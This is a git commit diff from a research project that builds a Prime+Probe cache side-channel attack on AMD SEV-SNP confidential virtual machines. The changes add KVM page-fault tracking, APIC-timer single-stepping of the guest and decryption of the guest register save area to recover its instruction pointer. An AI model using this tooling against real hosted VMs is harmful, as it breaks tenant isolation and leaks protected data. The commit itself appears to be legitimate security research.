cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit 10d3c8f52dc2c0f498e81946bef8292424fcd1ce
parent d27505ae4dbf2afa659df39d7498cae4b5da4454
Author: Louis Burda <quent.burda@gmail.com>
Date:   Tue, 15 Nov 2022 18:13:11 +0100

Various fixes and improvements

Fixed vmsa decode for getting rip in debug mode. Added state machine to data access tracking. Handle multiple unexpected data access page faults

Diffstat:
MMakefile | 2+-
Mcachepc/cachepc.h | 5++++-
Mcachepc/kvm.c | 14++++++++++----
Mcachepc/mmu.c | 77++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------------
Mcachepc/uapi.h | 8++++++++
Mnotes | 13+++++++------
Mtest/sev-es.c | 2+-
Mtest/sevstep.c | 177+++++++++----------------------------------------------------------------------
8 files changed, 108 insertions(+), 190 deletions(-)

diff --git a/Makefile b/Makefile @@ -25,7 +25,7 @@ load: sudo insmod $(LINUX)/arch/x86/kvm/kvm-amd.ko freq: - sudo cpupower frequency-set -f 2.60GHz + sudo cpupower frequency-set -f 1.5GHz update: git -C $(LINUX) diff 0aaa1e599bee256b3b15643bbb95e80ce7aa9be5 -G. > patch.diff diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h @@ -130,6 +130,9 @@ extern bool cachepc_single_step; extern uint32_t cachepc_track_mode; extern uint32_t cachepc_apic_timer; +extern uint32_t cachepc_track_state; +extern uint32_t cachepc_track_state_next; + extern bool cachepc_inst_fault_avail; extern uint64_t cachepc_inst_fault_gfn; extern uint32_t cachepc_inst_fault_err; @@ -287,6 +290,6 @@ void cachepc_apic_oneshot(uint32_t interval) { native_apic_mem_write(APIC_LVTT, LOCAL_TIMER_VECTOR | APIC_LVT_TIMER_ONESHOT); - native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_2); + native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_128); native_apic_mem_write(APIC_TMICT, interval); } diff --git a/cachepc/kvm.c b/cachepc/kvm.c @@ -1,8 +1,8 @@ #include "kvm.h" -#include "events.h" -#include "cachepc.h" -#include "tracking.h" #include "uapi.h" +#include "cachepc.h" +#include "event.h" +#include "track.h" #include "svm/svm.h" @@ -35,6 +35,11 @@ EXPORT_SYMBOL(cachepc_single_step); EXPORT_SYMBOL(cachepc_track_mode); EXPORT_SYMBOL(cachepc_apic_timer); +uint32_t cachepc_track_state; +uint32_t cachepc_track_state_next; +EXPORT_SYMBOL(cachepc_track_state); +EXPORT_SYMBOL(cachepc_track_state_next); + bool cachepc_inst_fault_avail = false; uint64_t cachepc_inst_fault_gfn = 0; uint32_t cachepc_inst_fault_err = 0; @@ -708,7 +713,8 @@ cachepc_kvm_init(void) cachepc_single_step = false; cachepc_track_mode = CPC_TRACK_ACCESS; - cachepc_apic_timer = 200; + + cachepc_track_state = CPC_TRACK_AWAIT_INST_FAULT; cachepc_data_fault_avail = false; cachepc_inst_fault_avail = false; diff --git a/cachepc/mmu.c b/cachepc/mmu.c @@ -3,48 +3,87 @@ #include "../cachepc/event.h" static void -cachepc_uspt_page_fault_handle(struct kvm_vcpu *vcpu, 
+cachepc_page_fault_handle(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault) { + bool inst_fetch; + if (!kvm_slot_page_track_is_active(vcpu->kvm, fault->slot, fault->gfn, KVM_PAGE_TRACK_ACCESS)) return; - pr_warn("Sevstep: Tracked page fault (gfn:%llu err:%u)\n", + pr_warn("CachePC: Tracked page fault (gfn:%llu err:%u)\n", fault->gfn, fault->error_code); - //pr_warn("Sevstep: Tracked page fault attrs %i %i %i\n", - // fault->present, fault->write, fault->user); + + inst_fetch = fault->error_code & PFERR_FETCH_MASK; + pr_warn("CachePC: Tracked page fault attrs p:%i w:%i x:%i f:%i\n", + fault->present, inst_fetch, fault->write, fault->exec); cachepc_untrack_single(vcpu, fault->gfn, KVM_PAGE_TRACK_ACCESS); if (cachepc_track_mode == CPC_TRACK_DATA_ACCESS) { - if (cachepc_single_step && cachepc_inst_fault_avail) { + if (cachepc_track_state == CPC_TRACK_AWAIT_INST_FAULT) { + /* first fault from instruction fetch */ + pr_warn("CachePC: Got inst fault gfn:%llu err:%u\n", + fault->gfn, fault->error_code); + if (!inst_fetch) + pr_err("CachePC: Expected inst fault but was not on fetch\n"); + + cachepc_inst_fault_gfn = fault->gfn; + cachepc_inst_fault_err = fault->error_code; + cachepc_inst_fault_avail = true; + cachepc_data_fault_avail = false; + + cachepc_single_step = true; + cachepc_apic_timer = 10; + + cachepc_track_state_next = CPC_TRACK_AWAIT_DATA_FAULT; + } else if (cachepc_track_state == CPC_TRACK_AWAIT_DATA_FAULT) { /* second fault from data access */ - pr_warn("Sevstep: Got data fault gfn:%llu err:%u\n", + pr_warn("CachePC: Got data fault gfn:%llu err:%u\n", fault->gfn, fault->error_code); cachepc_data_fault_gfn = fault->gfn; cachepc_data_fault_err = fault->error_code; cachepc_data_fault_avail = true; - cachepc_apic_timer = 160; - } else { - /* first fault from instruction fetch */ - pr_warn("Sevstep: Got inst fault gfn:%llu err:%u\n", + cachepc_single_step = true; + cachepc_apic_timer = 10; + + cachepc_track_state_next = CPC_TRACK_AWAIT_STEP_INTR; + } else if 
(cachepc_track_state == CPC_TRACK_AWAIT_STEP_INTR) { + /* unexpected extra fault before APIC interrupt */ + pr_err("CachePC: Got unexpected data fault gfn:%llu err:%u\n", fault->gfn, fault->error_code); + pr_err("CachePC: Data access step apic timer too large?\n"); - cachepc_inst_fault_gfn = fault->gfn; - cachepc_inst_fault_err = fault->error_code; - cachepc_inst_fault_avail = true; + cachepc_track_single(vcpu, cachepc_inst_fault_gfn, + KVM_PAGE_TRACK_ACCESS); + cachepc_inst_fault_avail = false; + + cachepc_track_single(vcpu, cachepc_data_fault_gfn, + KVM_PAGE_TRACK_ACCESS); cachepc_data_fault_avail = false; - cachepc_single_step = true; - cachepc_apic_timer = 170; + /* retrack fault we just got so we can start from scratch */ + cachepc_track_single(vcpu, fault->gfn, KVM_PAGE_TRACK_ACCESS); + + cachepc_send_tracking_event( + cachepc_inst_fault_gfn, cachepc_inst_fault_err, + cachepc_data_fault_gfn, cachepc_data_fault_err); + + cachepc_single_step = false; + + cachepc_track_state_next = CPC_TRACK_AWAIT_INST_FAULT; + } else { + pr_err("CachePC: Invalid tracking state: %i\n", cachepc_track_state); + cachepc_track_state_next = CPC_TRACK_AWAIT_INST_FAULT; } } else if (cachepc_track_mode == CPC_TRACK_EXEC_PAGES) { - /* TODO: skip if not exec */ + /* TODO: skip if not instruction decode fault */ /* TODO: calculate retired instructions (save and subtract global counter) */ if (cachepc_inst_fault_avail) { + /* track previous faulted page, current stays untracked */ cachepc_track_single(vcpu, cachepc_inst_fault_gfn, KVM_PAGE_TRACK_ACCESS); } @@ -63,7 +102,7 @@ cachepc_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) u64 spte; bool flush; - // pr_warn("Sevstep: spte_protect\n"); + // pr_warn("CachePC: spte_protect\n"); spte = *sptep; if (!is_writable_pte(spte) && !(pt_protect && is_mmu_writable_spte(spte))) @@ -98,7 +137,7 @@ cachepc_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) } flush |= mmu_spte_update(sptep, spte); - // 
pr_warn("Sevstep: spte_protect flush:%i\n", flush); + // pr_warn("CachePC: spte_protect flush:%i\n", flush); return flush; } @@ -130,7 +169,7 @@ cachepc_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, protected = false; - // pr_warn("Sevstep: mmu_slot_gfn_protect gfn:%llu\n", gfn); + // pr_warn("CachePC: mmu_slot_gfn_protect gfn:%llu\n", gfn); if (kvm_memslots_have_rmaps(kvm)) { for (i = min_level; i <= KVM_MAX_HUGEPAGE_LEVEL; ++i) { diff --git a/cachepc/uapi.h b/cachepc/uapi.h @@ -21,6 +21,8 @@ #define CPC_MSRMT_MAX (~((cpc_msrmt_t) 0)) +#define CPC_VMSA_MAGIC_ADDR ((void *) 0xC0FFEE) + #define KVM_CPC_TEST_ACCESS _IOWR(KVMIO, 0x20, __u32) #define KVM_CPC_TEST_EVICTION _IOWR(KVMIO, 0x21, __u32) #define KVM_CPC_INIT_PMC _IOW(KVMIO, 0x22, __u32) @@ -47,6 +49,12 @@ enum { CPC_TRACK_EXEC_PAGES }; +enum { + CPC_TRACK_AWAIT_INST_FAULT, + CPC_TRACK_AWAIT_DATA_FAULT, + CPC_TRACK_AWAIT_STEP_INTR +}; + enum kvm_page_track_mode { KVM_PAGE_TRACK_WRITE, KVM_PAGE_TRACK_ACCESS, diff --git a/notes b/notes @@ -1,7 +1,4 @@ Observations: -- some times get extra faults with race condition.. think there is - a race cond with track_page and something is untracking the pages again -- on Questions: - test/sevstep: why 0 then 15, arent both accesses in the first page? @@ -18,9 +15,13 @@ Next steps: - try adjusting timer for single stepping - Try to setup the non-baseline step without apic, but remapping page such that we see the relevant page faults and the gfn increment -- need to not retrack, allow the page to get remapped - (return false from sevstep_uspt_track.. caller) and enable single_step, - THEN when interrupt hits retrack the page - test/sevstep: implement counter.. read program memory to see how many instructions were executed on apic timer - add warning for high values in baseline + +Meeting questions: +- Why is decrypted rip sometimes off-by-one? + => +- VM gets interrupted independent of our APIC (by the scheduler) is this a problem? 
+ => +- diff --git a/test/sev-es.c b/test/sev-es.c @@ -446,7 +446,7 @@ collect(struct kvm *kvm) memset(&regs, 0, sizeof(regs)); ret = ioctl(kvm->vcpufd, KVM_GET_REGS, &regs); if (ret < 0) err(1, "KVM_GET_REGS"); - errx(1, "KVM_EXTI_MMIO: Victim %s at 0x%08llx: rip=0x%08llx\n", + errx(1, "KVM_EXIT_MMIO: Victim %s at 0x%08llx: rip=0x%08llx\n", kvm->run->mmio.is_write ? "write" : "read", kvm->run->mmio.phys_addr, regs.rip); } else if (kvm->run->exit_reason != KVM_EXIT_HLT) { diff --git a/test/sevstep.c b/test/sevstep.c @@ -114,149 +114,10 @@ hexdump(void *data, int len) __attribute__((section("guest_with"))) void vm_guest_with(void) { - /* counter starts at 10 */ - // asm volatile("mov $10, %%ebx" : : : "ebx"); - - //while (1) { - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm 
volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" 
: : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, 
%%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - asm volatile("mov $0x3140, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x3180, %%rax; mov (%%rax), %%al" : : : "rax"); - asm volatile("mov $0x31c0, %%rax; mov (%%rax), %%al" : : : "rax"); - - /* read from n'th page */ - // asm volatile("mov %0, %%ecx" : : "r" (L1_LINESIZE * L1_SETS) : "ecx"); - // asm volatile("mov %%ebx, %%eax" : : : "ebx", "eax"); - // asm volatile("imul %%ecx" : : : "ecx"); - // asm volatile("mov (%%eax), %%al" : : : "rax"); - - /* increment counter (n) */ - // asm volatile("inc %%ebx" : : : "ebx"); - - /* modulo 16 */ - // asm volatile("xor %%edx, %%edx" : : : "edx"); - // asm volatile("mov %%ebx, %%eax" : : : "ebx", "eax"); - // asm volatile("mov $16, %%ecx" : : : "ecx"); - // asm volatile("idiv %%ecx" : : : "ecx"); - // asm volatile("mov %%edx, %%ebx" : : : "ebx", "edx"); - - /* L1_LINESIZE * (L1_SETS * 2 + TARGET_SET) = 0x23c0 */ - //asm volatile("movq $0x23c0, %%rcx; mov %%eax, (%%rcx); inc %%eax" - // : : : "eax", "ebx", "rcx"); - //} - - asm volatile("hlt"); + while (1) { + asm volatile("mov (%0), %%eax" : : + "r" (L1_LINESIZE * (L1_SETS * 3 + TARGET_SET)) : "rax"); + } } bool @@ -418,18 +279,20 @@ sev_dbg_rip(int vmfd) { void *vmsa; uint64_t rip; - uint8_t buf[16]; int ret; vmsa = NULL; if (posix_memalign(&vmsa, PAGE_SIZE, PAGE_SIZE)) err(1, "memalign"); + memset(vmsa, 0, PAGE_SIZE); ret = ioctl(kvm_dev, KVM_CPC_VMSA_READ, vmsa); if 
(ret == -1) err(1, "ioctl VMSA_READ"); - sev_dbg_decrypt(vmfd, buf, vmsa + 0x160, 16); - hexdump(buf, 16); + sev_dbg_decrypt(vmfd, vmsa, CPC_VMSA_MAGIC_ADDR, PAGE_SIZE); + // hexdump(vmsa, PAGE_SIZE); + + rip = *(uint64_t *)(vmsa + 0x178); free(vmsa); @@ -551,13 +414,19 @@ cpc_msrmt_t * read_counts() { cpc_msrmt_t *counts; - int ret; + int i, ret; - counts = malloc(64 * sizeof(cpc_msrmt_t)); + counts = malloc(L1_SETS * sizeof(cpc_msrmt_t)); if (!counts) err(1, "malloc"); + ret = ioctl(kvm_dev, KVM_CPC_READ_COUNTS, counts); if (ret == -1) err(1, "ioctl READ_COUNTS"); + for (i = 0; i < L1_SETS; i++) { + if (counts[i] > 8) + errx(1, "Invalid counts set %i", i); + } + return counts; } @@ -608,14 +477,6 @@ runonce(struct kvm *kvm) if (ret < 0) err(1, "KVM_RUN"); } -uint64_t -svm_dbg_rip(struct kvm *kvm) -{ - /* TODO: decrypt vmsa */ - - return 0; -} - int monitor(struct kvm *kvm, bool baseline) { @@ -728,7 +589,7 @@ main(int argc, const char **argv) if (ret == -1) err(1, "ioctl MEASURE_BASELINE"); faultcnt = 0; - while (faultcnt < 20) { + while (faultcnt < 30) { if (monitor(&kvm_with_access, true)) break; } @@ -765,7 +626,7 @@ main(int argc, const char **argv) if (ret == -1) err(1, "ioctl ACK_EVENT"); faultcnt = 0; - while (faultcnt < 20) { + while (faultcnt < 30) { if (monitor(&kvm_with_access, false)) break; }